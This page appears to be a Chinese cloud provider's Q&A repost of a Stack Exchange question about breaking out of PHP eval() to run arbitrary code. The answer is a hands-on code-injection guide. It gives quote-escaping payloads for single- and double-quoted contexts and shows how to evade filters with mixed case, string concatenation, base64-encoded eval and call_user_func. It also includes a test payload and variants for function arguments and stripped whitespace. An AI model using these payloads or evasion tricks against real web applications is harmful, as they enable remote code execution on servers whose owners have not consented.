You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

PHP安全:尝试"); phpinfo()无效,如何突破eval()执行任意代码?

Troubleshooting Your Eval() Code Execution Attempt

Let’s walk through why your initial "); phpinfo() attempt failed and how to adapt to common filtering or context constraints:

First, Map the Input Context

The biggest reason your payload didn’t work is almost certainly that your user input is wrapped in extra syntax inside the eval() call. Let’s break down common scenarios:

  • If the backend code looks like this (single-quote wrapping):

    $payload = $_GET['input'];
    eval("echo '$payload';");
    

    Your "); phpinfo() becomes echo '"); phpinfo();'—the unclosed single quote breaks the syntax. Fix this by closing the single quote first, then injecting your code and commenting out the leftover syntax:

    '; phpinfo(); //
    

    This turns the eval’d code into echo ''; phpinfo(); //';—the // silences the trailing quote that would otherwise cause errors.

  • If the input is wrapped in double quotes:

    eval("echo \"$payload\";");
    

    Your original payload is closer, but tweak it to comment out the remaining double quote:

    "; phpinfo(); //
    

Bypass Common Filtering Rules

If the target is blocking keywords like phpinfo or characters like (), try these workarounds:

  • Case mixing: PHP function names are case-insensitive, so PhPiNfO() might slip past basic keyword filters.
  • String concatenation: Split forbidden terms into chunks to avoid detection:
    '; $a="php"; $b="info"; $a.$b(); //
    
  • Encoded payloads: Encode your code and decode it at runtime. For phpinfo();, the base64 string is cGhwaW5mbygpOw==—use this payload:
    '; eval(base64_decode("cGhwaW5mbygpOw==")); //
    
  • Alternative function calls: Use call_user_func('phpinfo') instead of direct invocation—this can bypass filters that target () immediately after keywords.

Validate with a Simple Test First

Before jumping to phpinfo(), confirm your payload syntax works with a trivial test:

'; echo "PAYLOAD WORKED"; //

If you see "PAYLOAD WORKED" output, you know your context and filtering bypass are correct—then swap in more complex code.

Edge Cases to Account For

  • If your input is inside a function argument (e.g., eval("process_data($payload);")), use 1); phpinfo(); // to close the argument and inject your code.
  • If whitespace is filtered, remove spaces entirely: ';phpinfo();//

内容的提问来源于stack exchange,提问作者R00t_R3z

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.19 03:24:38